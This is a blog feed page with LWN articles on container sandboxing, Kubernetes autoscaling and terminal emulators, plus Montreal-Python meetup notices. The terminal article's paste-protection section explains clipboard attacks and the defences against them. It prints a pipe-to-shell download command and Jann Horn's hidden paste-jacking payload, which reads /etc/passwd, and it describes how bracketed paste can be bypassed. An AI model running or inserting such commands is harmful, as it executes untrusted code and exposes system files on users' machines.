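In practice, gVisor plugs into Docker as an additional OCI runtime called runsc; once the runtime is registered with the daemon, selecting it is a one-flag change (the image name is hypothetical):

# /etc/docker/daemon.json registers the extra runtime, for example:
#   { "runtimes": { "runsc": { "path": "/usr/local/bin/runsc" } } }
# After restarting the daemon, run individual containers under gVisor:
docker run --rm --runtime=runsc registry.example.com/app:1.0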

According to He, gVisor has a 150ms startup time and a 15MB overhead, close to Kata Containers startup times, but smaller in terms of memory. He said the approach is good for small containers in high-density workloads. It is not so useful for trusted images (because it's not required), workloads that make heavy use of system calls (because of the performance overhead), or workloads that require hardware access (because that's not available at all). Even though gVisor implements a large number of system calls, some functionality is missing. There is no System V shared memory, for example, which means PostgreSQL does not work under gVisor. A simple ping might not work either, as gVisor lacks SOCK_RAW support. Linux has been in use for decades now and is more than just a set of system calls: interfaces like /proc and sysfs also make Linux what it is. Of those, gVisor currently implements only a subset of /proc, with the result that some containers will not work with gVisor without modification, for now.

As an aside, the new hypervisor does allow for experimentation and development of new system calls directly in user space. The speakers confirmed this was another motivation for the project; the hope is that having a user-space kernel will allow faster iteration than working directly in the Linux kernel.

Escape from the hypervisor

Of course, hypervisors like gVisor are only a part of the solution to pod security. In his talk, Allclair warned that even with a hypervisor, there are still ways to escape a container. He cited the CVE-2017-1002101 vulnerability, which allows hostile container images to take over a host through specially crafted symbolic links. Like native containers, hypervisors like Kata Containers also allow the guest to mount filesystems across the container boundary, so they are vulnerable to such an attack.

Kubernetes fixed that specific bug, but a general solution is still in the design phase. Allclair said that ephemeral storage should be treated as opaque to the host, making sure that the host never interacts directly with image files and just passes them down to the guest untouched. Similarly, runtimes should "mount block volumes directly into the sandbox, not onto the host". Network filesystems are trickier; while it's possible to mount (say) a Ceph filesystem in the guest, that means the access credentials now reside within the guest, which moves the security boundary into the untrusted container.

Allclair outlined networking as another attack vector: Kubernetes exposes a lot of unauthenticated services on the network by default. In particular, the API server is a gold mine of information about the cluster. Another attack vector is untrusted data flows from containers to the user. For example, container logs travel through various Kubernetes components, and some components, like Fluentd, will end up parsing those logs directly. Allclair said that many different programs are "looking at untrusted data; if there's a vulnerability there, it could lead to remote code execution". When he looked at the history of vulnerabilities in that area, he could find no direct code execution, but "one of the dependencies in Fluentd for parsing JSON has seven different bugs with segfault issues so we can see that could lead to a memory vulnerability". As a possible solution to such issues, Allclair proposed isolating components in their own (native, as opposed to sandboxed) containers, which might be sufficient because Fluentd acts as a first trusted boundary.

Conclusion

A lot of work is happening to improve what is widely perceived as defective container isolation in the Linux kernel. Some take the approach of trying to run containers as regular users ("rootless containers") and rely on the Linux kernel's user-isolation properties. Others find this relies too much on the security of the kernel and use separate hypervisors, like Kata Containers and gVisor. The latter seems especially interesting because it is lightweight and doesn't add much attack surface. In comparison, Kata Containers relies on a kernel running inside the container, which actually expands the attack surface instead of reducing it. The proposed API for sandboxed containers is currently experimental in the containerd and CRI-O projects; Allclair expects the API to ship in alpha as part of the Kubernetes 1.12 release.

It's important to keep in mind that hypervisors are not a panacea: they do not support all workloads because of compatibility and performance issues. A hypervisor is only a partial solution; Allclair said the next step is to provide hardened interfaces for storage, logging, and networking and encouraged people to get involved in the node special interest group and the proposal [Google Docs] on the topic.

This article first appeared in the Linux Weekly News.


Montreal-Python 72: Call for speakers

Montreal Python - Sun, 05/13/2018 - 23:00

We are looking for lightning talks (5min) submissions for our next event. Send your proposals at team@montrealpython.org

When

June 11th, 2018 6PM to 9PM

Where

To be determined


Autoscaling for Kubernetes workloads

Anarcat - Sun, 05/13/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

Technologies like containers, clusters, and Kubernetes offer the prospect of rapidly scaling the available computing resources to match variable demands placed on the system. Actually implementing that scaling can be a challenge, though. During KubeCon + CloudNativeCon Europe 2018, Frederic Branczyk from CoreOS (now part of Red Hat) held a packed session to introduce a standard and officially recommended way to scale workloads automatically in Kubernetes clusters.

Kubernetes has had an autoscaler since the early days, but only recently did the community implement a more flexible and extensible mechanism to make decisions on when to add more resources to fulfill workload requirements. The new API integrates not only the Prometheus project, which is popular in Kubernetes deployments, but also any arbitrary monitoring system that implements the standardized APIs.

The old and new autoscalers

Branczyk first covered the history of the autoscaler architecture and how it has evolved through time. Kubernetes, since version 1.2, features a horizontal pod autoscaler (HPA), which dynamically allocates resources depending on the detected workload. When the load becomes too high, the HPA increases the number of pod replicas and, when the load goes down again, it removes superfluous copies. In the old HPA, a component called Heapster would pull usage metrics from the internal cAdvisor monitoring daemon and the HPA controller would then scale workloads up or down based on those metrics.

Unfortunately, the controller would only make decisions based on CPU utilization, even though Heapster provides other metrics like disk, memory, or network usage. According to Branczyk, while in theory any workload can be converted to a CPU-bound problem, this is an inconvenient limitation, especially when implementing higher-level service level agreements. For example, an arbitrary agreement like "process 95% of requests within 100 milliseconds" would be difficult to represent as a CPU-usage problem. Another limitation is that the Heapster API was only loosely defined and never officially adopted as part of the larger Kubernetes API. Heapster also required the help of a storage backend like InfluxDB or Google's Stackdriver to store samples, which made deploying an HPA challenging.

In late 2016, the "autoscaling special interest group" (SIG autoscaling) decided that the pipeline needed a redesign that would allow scaling based on arbitrary metrics from external monitoring systems. The result is that Kubernetes 1.6 shipped with a new API specification defining how the autoscaler integrates with those systems. Having learned from the Heapster experience, the developers specified the new API, but did not implement it for any specific system. This shifts responsibility of maintenance to the monitoring vendors: instead of "dumping" their glue code in Heapster, vendors now have to maintain their own adapter conforming to a well-defined API to get certified.

The new specification defines core metrics like CPU, memory, and disk usage. Kubernetes provides a canonical implementation of those metrics through the metrics server, a stripped-down version of Heapster. The metrics server provides the core metrics required by Kubernetes so that scheduling, autoscaling, and things like kubectl top work out of the box. This means that any Kubernetes 1.8 cluster now supports autoscaling using those metrics: for example, Minikube and Google Kubernetes Engine both offer a native metrics server without an external database or monitoring system.
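
With the metrics server deployed, those core metrics are directly visible from the command line, which is a quick way to check that the pipeline feeding the autoscaler is working:

# Current CPU and memory usage of the cluster nodes and of pods in a namespace
kubectl top nodes
kubectl top pods --namespace kube-system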

In terms of configuration syntax, the change is minimal. Here is an example of how to configure the autoscaler in earlier Kubernetes releases, taken from the OpenShift Container Platform documentation:

apiVersion: extensions/v1beta1
kind: HorizontalPodAutoscaler
metadata:
  name: frontend
spec:
  scaleRef:
    kind: DeploymentConfig
    name: frontend
    apiVersion: v1
    subresource: scale
  minReplicas: 1
  maxReplicas: 10
  cpuUtilization:
    targetPercentage: 80

The new API configuration is more flexible:

apiVersion: autoscaling/v2beta1
kind: HorizontalPodAutoscaler
metadata:
  name: hpa-resource-metrics-cpu
spec:
  scaleTargetRef:
    apiVersion: apps/v1beta1
    kind: ReplicationController
    name: hello-hpa-cpu
  minReplicas: 1
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      targetAverageUtilization: 50

Notice how the cpuUtilization field is replaced by a more flexible metrics field that targets CPU utilization, but can support other core metrics like memory usage.
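
For example, a memory-based target in the same autoscaling/v2beta1 syntax would look roughly like this (the target value is arbitrary):

metrics:
- type: Resource
  resource:
    name: memory
    targetAverageValue: 500Mi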

The ultimate goal of the new API, however, is to support arbitrary metrics, through the custom metrics API. This behaves like the core metrics, except that Kubernetes does not ship or define a set of custom metrics directly, which is where systems like Prometheus come in. Branczyk demonstrated the k8s-prometheus-adapter, which connects any Prometheus metric to the Kubernetes HPA, allowing the autoscaler to add new pods to reduce request latency, for example. Those metrics are bound to Kubernetes objects (e.g. pod, node, etc.) but an "external metrics API" was also introduced in the last two months to allow arbitrary metrics to influence autoscaling. This could allow Kubernetes to scale up a workload to deal with a larger load on an external message broker service, for example.

Here is an example of the custom metrics API pulling metrics from Prometheus to make sure that each pod handles around 200 requests per second:

metrics:
- type: Pods
  pods:
    metricName: http_requests
    targetAverageValue: 200

Here http_requests is a metric exposed by the Prometheus server which looks at how many requests each pod is processing. To avoid putting too much load on each pod, the HPA will then ensure that this number will be around a target value by spawning or killing pods as appropriate.

Upcoming features

The SIG seems to have rounded up everything quite neatly. The next step is to deprecate Heapster: as of 1.10, all critical parts of Kubernetes use the new API, so a discussion is under way in another group (SIG instrumentation) to finish moving away from the older design.

Another thing the community is looking into is vertical scaling. Horizontal scaling is fine for certain workloads, like caching servers or application frontends, but database servers, most notably, are harder to scale by just adding more replicas; in this case what an autoscaler should do is increase the size of the replicas instead of their numbers. Kubernetes supports this through the vertical pod autoscaler (VPA). It is less practical than the HPA because there is a physical limit to the size of individual servers that the autoscaler cannot exceed, while the HPA can scale up as long as you add new servers. According to Branczyk, the VPA is also more "complicated and fragile, so a lot more thought needs to go into that." As a result, the VPA is currently in alpha. It is not fully compatible with the HPA and is relevant only in cases where the HPA cannot do the job: for example, workloads where there is only a single pod or a fixed number of pods like StatefulSets.

Branczyk gave a set of predictions for other improvements that could come down the pipeline. One issue he identified is that, while the HPA and VPA can scale pods, there is a separate Cluster Autoscaler (CA) that manages nodes, which are the actual machines running the pods. The CA allows a cluster to move pods between the nodes to remove underutilized nodes or create new nodes to respond to demand. It's similar to the HPA, except the HPA cannot provision new hardware resources like physical machines on its own: it only creates new pods on existing nodes. The idea here is to combine the two projects into a single one to keep a uniform interface for what is really the same functionality: scaling a workload by giving it more resources.

Another hope is that OpenMetrics will emerge as a standard for metrics across vendors. This process seems to be well under way with Kubernetes already using the Prometheus library, which serves as a basis for the standard, and with commercial vendors like Datadog supporting the Prometheus API as well. Another area of possible standardization is the gRPC protocol used in some Kubernetes clusters to communicate between microservices. Those endpoints can now expose metrics through "interceptors" that get executed before the request is passed to the application. One of those interceptors is the go-grpc-prometheus adapter, which enables Prometheus to scrape metrics from any gRPC-enabled service. The ultimate goal is to have standard metrics deployed across an entire cluster, allowing the creation of reusable dashboards, alerts, and autoscaling mechanisms in a uniform system.

Conclusion

This session was one of the most popular of the conference, which shows a deep interest in this key feature of Kubernetes deployments. It was great to see Branczyk, who is involved with the Prometheus project as well, work on standardization so other systems can work with Kubernetes.

The speed at which APIs change is impressive; in only a few months, the community upended a fundamental component of Kubernetes and replaced it with a new API that users will need to become familiar with. Given the flexibility and clarity of the new API, it is a small cost to pay to represent business logic inside such a complex system. Any simplification will surely be welcome in the maelstrom of APIs and subsystems that Kubernetes has become.

A video of the talk and slides [PDF] are available. SIG autoscaling members Marcin Wielgus and Solly Ross presented an introduction (video) and deep dive (video) talks that might be interesting to our readers who want all the gory details about Kubernetes autoscaling.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

Montréal-Python 71 - Burning Yeti

Montreal Python - Sun, 04/29/2018 - 23:00

Enjoy our May meetup just in time before PyCon US with these amazing speakers - two of whom will be presenting at PyCon!

Please RSVP on Meetup

Thanks to Google Montreal for sponsoring the event!

Presentations
Survival analysis for conversion rates - Tristan Boudreault

What percentage of your users will spend? Typically, analysts use the conversion rate to assess how successful a website is at converting trial users into paying ones. But is this calculation giving us results that are lower than reality? With a talk rich in examples, Tristan will show how Shopify reframes the traditional conversion questions in survival analysis terms.

Data Science at Shopify - Françoise Provencher

Françoise is a data science technical lead at Shopify, a multi-channel commerce platform that has a decade-worth of data on a very diverse set of businesses. We’ll hear about how Python is particularly useful when it comes to understanding Shopify’s user base by sifting through tons of data.

This presentation will be in English.

Integrate Geocode data with Python - Jean Luc Semedo

Applications that integrate geolocation modules are more and more in demand. With Python, there are many libraries that handle geolocation natively and very simply. During this presentation, we will go over a few of them: Geopy, pyproj, Mapnik, GeoDjango...

Jean Luc Semedo, freelance back-end and mobile developer

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:30PM - End of the event
  • 9:00PM - Benelux
When

Monday, May 7th, 2018 at 6:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC

Categories: External Blogs

Call for speaker - Montréal-Python 71 - Burning Yeti

Montreal Python - Sun, 04/15/2018 - 23:00

Hey!

We are looking for speakers for our next Montreal-Python meetup. Submit your proposals (up to 30 minutes) at team@montrealpython.org or come join us on our Slack at http://slack.mtlpy.org/ if you would like to discuss it.

Cheers!

When

Monday, May 7th, 2018, 6:00PM-9:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC

Full event info: http://montrealpython.org/en/2018/04/mp71

Categories: External Blogs

A look at terminal emulators, part 2

Anarcat - Sat, 04/14/2018 - 19:00

This article is the second in a two-part series about terminal emulators.

A comparison of the feature sets for a handful of terminal emulators was the subject of a recent article; here I follow that up by examining the performance of those terminals. This might seem like a lesser concern, but as it turns out, terminals exhibit surprisingly high latency for such fundamental programs. I also examine what is traditionally considered "speed" (but is really scroll bandwidth) and memory usage, with the understanding that the impact of memory use is less than it was when I looked at this a decade ago (in French).

Latency

After thorough research on terminal emulator performance, I have come to the conclusion that latency is its most important aspect. In his Typing with pleasure article, Pavel Fatin reviewed the latency of various text editors and hinted that terminal emulators might be slower than the fastest text editors. That is what eventually led me to run my own tests on terminal emulators and write this series.

But what is latency and why does it matter? In his article, Fatin defined latency as "a delay between the keystroke and corresponding screen update" and quoted the Handbook of Human-Computer Interaction which says: "Delay of visual feedback on a computer display have important effects on typist behavior and satisfaction."

Fatin explained that latency has more profound effects than just satisfaction: "typing becomes slower, more errors occur, eye strain increases, and muscle strain increases". In other words, latency can lead to typos but also to lesser code quality as it imposes extra cognitive load on the brain. But worse, "eye and muscle strain increase" seems to imply that latency can also lead to physical repetitive strain injuries.

Some of those effects have been known for a long time, with some results published in the Ergonomics journal in 1976 showing that a hundred-millisecond delay "significantly impairs the keying speed". More recently, the GNOME Human Interface Guidelines set the acceptable response time at ten milliseconds and, pushing this limit down even further, this video from Microsoft Research shows that the ideal target might even be as low as one millisecond.

Fatin performed his tests on editors, but he created a portable tool called Typometer that I used to test latency in terminal emulators. Keep in mind that the test is a simulation: in reality, we also need to take into account input (keyboard, USB controller, etc.) and output (graphics card and monitor buffers) latency. Those typically add up to more than 20ms in typical configurations, according to Fatin. With more specialized "gaming" hardware, the bare minimum is around three milliseconds. There is therefore little room for applications to add any latency to the pipeline. Fatin's goal is to bring that extra latency down to one millisecond or even zero-latency typing, which was released as part of IntelliJ IDEA 15. Here are my measurements, which include some text editors, showing that my results are consistent with Fatin's (all times in milliseconds):

Program           mean   std    min    90%    max
uxterm             1.7   0.3    0.7    2      2.4
mlterm             1.8   0.3    0.7    2.2    2.5
Vim (Athena)       2.8   1.1    0.4    3.5   12.7
Vim (GTK2)         3.9   1.2    0.7    4.8   11.9
Emacs              4.8   2.3    0.5    5.8   32.5
gedit              8.9   3.4    2.8   12.5   14.2
Konsole           13.4   1.2   11.5   15     16.1
Alacritty         15.1   1.2   12.8   15.9   26.3
st                15.7   3.9   10.6   19.4   19.6
Vim (GTK3)        16.5   7.9    0.4   21.9   27.2
urxvt             18.3   0.3   17.3   18.7   19
pterm             23.4   0.9   21.7   24.5   25.4
GNOME Terminal    27.1   1     25.9   27.5   39.3
Xfce Terminal     27.4   0.4   26.4   27.9   28.7
Terminator        28.1   0.7   26.4   29     29.4
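As an aside, the summary columns above are easy to derive from raw samples. The short sketch below is not Typometer itself and uses made-up numbers; it only shows how such a table row can be computed:

import statistics

# Not Typometer: just how mean/std/min/90%/max can be derived from raw
# latency samples (values in milliseconds; numbers here are illustrative).
samples = [1.7, 1.9, 1.4, 2.0, 1.6, 2.4, 1.8]

samples.sort()
print("mean:", round(statistics.mean(samples), 1))
print("std: ", round(statistics.stdev(samples), 1))
print("min: ", samples[0])
print("90%: ", samples[int(0.9 * (len(samples) - 1))])  # crude percentile
print("max: ", samples[-1])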

The first thing that struck me is that old programs like xterm and mlterm have the best response time, with a worst-case latency (2.4ms) better than the best case of all other terminals (10.6ms for st). No modern terminal crosses the ten-millisecond threshold. In particular, Alacritty doesn't seem to live up to its "fastest terminal emulator in existence" claim either, although results have improved since I first tested the program in July 2017. Indeed, the project seems to be aware of the situation and is working on improving the display pipeline with threads. We can also note that Vim using GTK3 is slower than its GTK2 counterpart by an order of magnitude. It might therefore be possible that the GTK3 framework introduces extra latency, as we can also observe that other GTK3-based terminals (Terminator, Xfce4 Terminal, and GNOME Terminal, for example) have higher latency.

You might not notice those differences. As Fatin explains: "one does not necessarily need to perceive latency consciously to be affected by it". Fatin also warns about standard deviation (the std column above and the width of error bars in the graph): "any irregularities in delay durations (so called jitter) pose additional problem because of their inherent unpredictability".

The graph above is from a clean Debian 9 (stretch) profile with the i3 window manager. That environment gives the best results in the latency test: as it turns out, GNOME introduces about 20ms of latency to all measurements. A possible explanation could be that there are programs running that synchronously handle input events: Fatin gives the example of Workrave, which adds latency by processing all input events synchronously. By default, GNOME also includes a compositing window manager (Mutter), an extra buffering layer that adds at least eight milliseconds in Fatin's tests.

In the graph above, we can see the same tests performed on Fedora 27 with GNOME running on X.org. The change is drastic; latency at least doubled and in some cases is ten times larger. Forget the one millisecond target: all terminals go far beyond the ten milliseconds budget. The VTE family gets closer to fifty milliseconds with Terminology and GNOME Terminal having spikes well above that threshold. We can also see there's more jitter in those tests. Even with the added latency, we can see that mlterm and, to a lesser extent, xterm still perform better than their closest competitors, Konsole and st.

Scrolling speed

The next test is the traditional "speed" or "bandwidth" test that measures how fast the terminal can scroll by displaying a large amount of text on the terminal at once. The mechanics of the test vary; the original test I found was simply to generate the same test string repeatedly using the seq command. Other tests include one from Thomas E. Dickey, the xterm maintainer, which dumps the terminfo.src file repeatedly. In another review of terminal performance, Dan Luu uses a base32-encoded string of random bytes that is simply dumped on the terminal with cat. Luu considers that kind of test to be "as useless a benchmark as I can think of" and suggests using the terminal's responsiveness during the test as a metric instead. Dickey also dismisses that test as misleading. Yet both authors recognize that bandwidth can be a problem: Luu discovered the Emacs Eshell hangs while showing large files and Dickey implemented an optimization to work around the perceived slowness of xterm. There is therefore still some value in this test as the rendering process varies a lot between terminals; it also serves as a good test harness for testing other parameters.

Here we can see rxvt and st are ahead of all others, closely followed by the much newer Alacritty, expressly designed for speed. Xfce (representing the VTE family) and Konsole are next, running at almost twice the time while xterm comes last, almost five times as slow as rxvt. During the test, xterm also had jitter in the display: it was difficult to see the actual text going by, even if it was always the same string. Konsole was fast, but it was cheating: the display would hang from time to time, showing a blank or partially drawn display. Other terminals generally display all lines faithfully, including st, Alacritty, and rxvt.

Dickey explains that performance variations are due to the design of scrollback buffers in the different terminals. Specifically, he blames the disparity on rxvt and other terminals "not following the same rules":

Unlike xterm, rxvt did not attempt to display all updates. If it fell behind, it would discard some of the updates, to catch up. Doing that had a greater effect on the apparent scrolling speed than its internal memory organization, since it was useful for any number of saved-lines. One drawback was that ASCII animations were somewhat erratic.

To fix this perceived slowness of xterm, Dickey introduced the fastScroll resource to allow xterm to drop some screen updates to catch up with the flow and, indeed, my tests confirm the resource improves performance to match rxvt. It is, however, a rather crude implementation as Dickey explains: "sometimes xterm — like konsole — appears to stop, since it is waiting for a new set of screen updates after having discarded some". In this case, it seems that other terminals found a better compromise between speed and display integrity.

Resource usage

Regardless of the worthiness of bandwidth as a performance metric, it does provide a way to simulate load on the terminals, which in turn allows us to measure other parameters like memory or disk usage. The metrics here were obtained by running the above seq benchmark under the supervision of a Python process that collected the results of getrusage() counters for ru_maxrss, the sum of ru_oublock and ru_inblock, and a simple timer for wall clock time.
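Here is a minimal sketch of such a supervisor, not the actual script used for these benchmarks; the terminal invocation (xterm -e) and the size of the seq run are assumptions chosen for illustration:

import resource
import subprocess
import time

# Launch the terminal under test with the seq benchmark as its command, then
# read the rusage counters for the children once it exits.
# "xterm -e" is only an example invocation; adjust for other terminals.
cmd = ["xterm", "-e", "sh", "-c", "seq 1 100000"]

start = time.monotonic()
subprocess.run(cmd)
wall = time.monotonic() - start

usage = resource.getrusage(resource.RUSAGE_CHILDREN)
print("wall clock (s): ", round(wall, 2))
print("max RSS (KB):   ", usage.ru_maxrss)   # ru_maxrss is in kilobytes on Linux
print("blocks in + out:", usage.ru_inblock + usage.ru_oublock)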

St comes first in this benchmark with the smallest memory footprint, 8MB on average, which was no surprise considering the project's focus on simplicity. Slightly larger are mlterm, xterm, and rxvt at around 12MB. Another notable result is Alacritty, which takes a surprising amount of memory at 30MB. Next come the VTE family members, which vary between 40 and 60MB, a higher result that could be explained by those programs' use of higher-level libraries like GTK. Konsole comes last with a whopping 65MB of memory usage during the tests, although that might be excused due to its large feature set.

Compared with the results I had a decade ago, all programs take up much more memory. Xterm used to take 4MB of memory, but now takes 15MB just on startup. A similar increase also affects rxvt, which now takes 16MB of memory out of the box. The Xfce Terminal now takes 34MB, a three-fold increase, yet GNOME Terminal only takes 20MB on startup. Of course, the previous tests were done on a 32-bit architecture. At LCA 2012, Rusty Russell also explained there are many more subtle reasons that could explain such an increase. Besides, maybe this is something we can live with in this modern day and age of multi-gigabyte core memory sizes.

Yet I can't help but feel there's a waste of resources for something so fundamental as a terminal. Those programs should be the smallest of the small and should be able to run in a shoe box, when those eventually run Linux (you know they will). Yet with those numbers, memory usage would be a concern only when running multiple terminals in anything but the most limited of environments. To compensate, GNOME Terminal, Konsole, urxvt, Terminator, and Xfce Terminal feature a daemon mode that manages multiple terminals through a single process which limits the impact of their larger memory footprint.

Another result I have found surprising in my tests is actual disk I/O: I did not expect any, yet some terminals write voluminous amounts of data to disk. It turns out the VTE library actually writes the scrollback buffer to disk, a "feature" that was noticed back in 2010 and that is still present in modern implementations. At least the file contents are now encrypted with AES256 GCM since 0.39.2, but this raises the question of what's so special about the VTE library that it requires such an exotic approach.

Conclusion

In the previous article, we found that VTE-based terminals have a good feature set, yet here we see that this comes with some performance costs. Memory isn't a big issue since all VTE terminals are spawned from a single daemon process that limits memory usage. Old systems tight on core memory might still need older terminals with lower memory usage, however. While VTE terminals behave well in bandwidth tests, their latency is higher than the criterion set in the GNOME Human Interface Guidelines, which is probably something that the developers of the VTE library should look into. Considering how inevitable the terminal is even for novice users in Linux, those improvements might make the experience slightly less traumatic. For seasoned geeks, changing from the default terminal might even mean quality improvements and fewer injuries during long work sessions. Unfortunately, only the old xterm and mlterm get us to the magic 10ms range, which might involve unacceptable compromises for some.

The latency benchmarks also show there are serious tradeoffs that came with the introduction of compositors in Linux graphical environments. Some users might want to take a look at conventional window managers, since they provide significant latency improvements. Unfortunately, it was not possible to run latency tests in Wayland: the Typometer program does exactly the kind of things Wayland was designed to prevent, namely inject keystrokes and spy on other windows. Hopefully, Wayland compositors are better than X.org at performance and someone will come up with a way of benchmarking latency in those environments in the future.

This article first appeared in the Linux Weekly News.

Categories: External Blogs

A look at terminal emulators, part 1

Anarcat - Thu, 03/29/2018 - 19:00

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal         Debian          Fedora    Upstream   Notes
Alacritty        N/A             N/A       6debc4f    no releases, Git head
GNOME Terminal   3.22.2          3.26.2    3.28.0     uses GTK3, VTE
Konsole          16.12.0         17.12.2   17.12.3    uses KDE libraries
mlterm           3.5.0           3.7.0     3.8.5      uses VTE, "Multi-lingual terminal"
pterm            0.67            0.70      0.70       PuTTY without ssh, uses GTK2
st               0.6             0.7       0.8.1      "simple terminal"
Terminator       1.90+bzr-1705   1.91      1.91       uses GTK3, VTE
urxvt            9.22            9.22      9.22       main rxvt fork, also known as rxvt-unicode
Xfce Terminal    0.8.3           0.8.7     0.8.7.2    uses GTK3, VTE
xterm            327             330       331        the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

Many terminals fail this test: Alacritty, VTE-derivatives (GNOME Terminal, Terminator, and XFCE Terminal), urxvt, st, and xterm all show Sarah's name backwards—as if we would display it as "Haras" in English.

The other challenge with bi-directional text is how to align it, especially mixed RTL and left-to-right (LTR) text. RTL scripts should start from the right side of the terminal, but what should happen in a terminal where the prompt is in English, on the left? Most terminals do not make special provisions and align all of the text on the left, including Konsole, which otherwise displays Sarah's name in the right order. Here, pterm and mlterm seem to be sticking to the standard a little more closely and align the test string on the right.

Paste protection

The next critical feature I have identified is paste protection. While it is widely known that incantations like:

$ curl http://example.com/ | sh

are arbitrary code execution vectors, a less well-known vulnerability is that hidden commands can sneak into copy-pasted text from a web browser, even after careful review. Jann Horn's test site brilliantly shows how the apparently innocuous command:

git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

gets turned into this nasty mess (reformatted a bit for easier reading) when pasted from Horn's site into a terminal:

git clone /dev/null; clear; echo -n "Hello ";
whoami|tr -d '\n';
echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! \
  Here'"'"'s the first line of your /etc/passwd: ';
head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

This works by hiding the evil code in a <span> block that's moved out of the viewport using CSS.

Bracketed paste mode is explicitly designed to neutralize this attack. In this mode, terminals wrap pasted text in a pair of special escape sequences to inform the shell of that text's origin. The shell can then ignore special editing characters found in the pasted text. Terminals going all the way back to the venerable xterm have supported this feature, but bracketed paste also needs support from the shell or application running on the terminal. For example, software using GNU Readline (e.g. Bash) needs the following in the ~/.inputrc file:

set enable-bracketed-paste on
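To make the mechanism more concrete, here is a small sketch, not taken from any of the terminals or shells reviewed, that enables bracketed paste and dumps what the terminal actually sends: pasted text arrives wrapped between the ESC[200~ and ESC[201~ sequences.

import os
import sys
import termios
import tty

# Enable bracketed paste, read raw input, and show the \x1b[200~ ... \x1b[201~
# wrapper the terminal adds around pasted text. Single-line pastes work best
# for this quick demonstration.
ENABLE, DISABLE = "\x1b[?2004h", "\x1b[?2004l"

fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
tty.setcbreak(fd)                      # deliver bytes as they arrive
sys.stdout.write(ENABLE)
sys.stdout.flush()
print("paste something, then press Enter...")
try:
    data = b""
    while not data.endswith((b"\x1b[201~", b"\n", b"\r")):
        data += os.read(fd, 4096)
    print(repr(data))                  # look for the 200~/201~ markers
finally:
    sys.stdout.write(DISABLE)
    sys.stdout.flush()
    termios.tcsetattr(fd, termios.TCSADRAIN, old)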

Unfortunately, Horn's test page also shows how to bypass this protection, by including the end-of-pasted-text sequence in the pasted text itself, thus ending the bracketed mode prematurely. This works because some terminals do not properly filter escape sequences before adding their own. For example, in my tests, Konsole fails to properly escape the second test, even with .inputrc properly configured. That means it is easy to end up with a broken configuration, either due to an unsupported application or misconfigured shell. This is particularly likely when logged on to remote servers where carefully crafted configuration files may be less common, especially if you operate many different machines.

A good solution to this problem is the confirm-paste plugin of the urxvt terminal, which simply prompts before allowing any paste with a newline character. I haven't found another terminal with such definitive protection against the attack described by Horn.

Tabs and profiles

A popular feature is support for a tabbed interface, which we'll define broadly as a single terminal window holding multiple terminals. This feature varies across terminals: while traditional terminals like xterm do not support tabs at all, more modern implementations like Xfce Terminal, GNOME Terminal, and Konsole all have tab support. Urxvt also features tab support through a plugin. But in terms of tab support, Terminator takes the prize: not only does it support tabs, but it can also tile terminals in arbitrary patterns (as seen at the right).

Another feature of Terminator is the capability to "group" those tabs together and to send the same keystrokes to a set of terminals all at once, which provides a crude way to do mass operations on multiple servers simultaneously. A similar feature is also implemented in Konsole. Third-party software like Cluster SSH, xlax, or tmux must be used to have this functionality in other terminals.

Tabs work especially well with the notion of "profiles": for example, you may have one tab for your email, another for chat, and so on. This is well supported by Konsole and GNOME Terminal; both allow each tab to automatically start a profile. Terminator, on the other hand, supports profiles, but I could not find a way to have specific tabs automatically start a given program. Other terminals do not have the concept of "profiles" at all.

Eye candy

The last feature I considered is the terminal's look and feel. For example, GNOME, Xfce, and urxvt support transparency, background colors, and background images. Terminator also supports transparency, but recently dropped support for background images, which made some people switch to another tiling terminal, Tilix. I am personally happy with only an Xresources file setting a basic color set (Solarized) for urxvt. Such non-standard color themes can create problems, however. Solarized, for example, breaks with color-using applications such as htop and IPTraf.

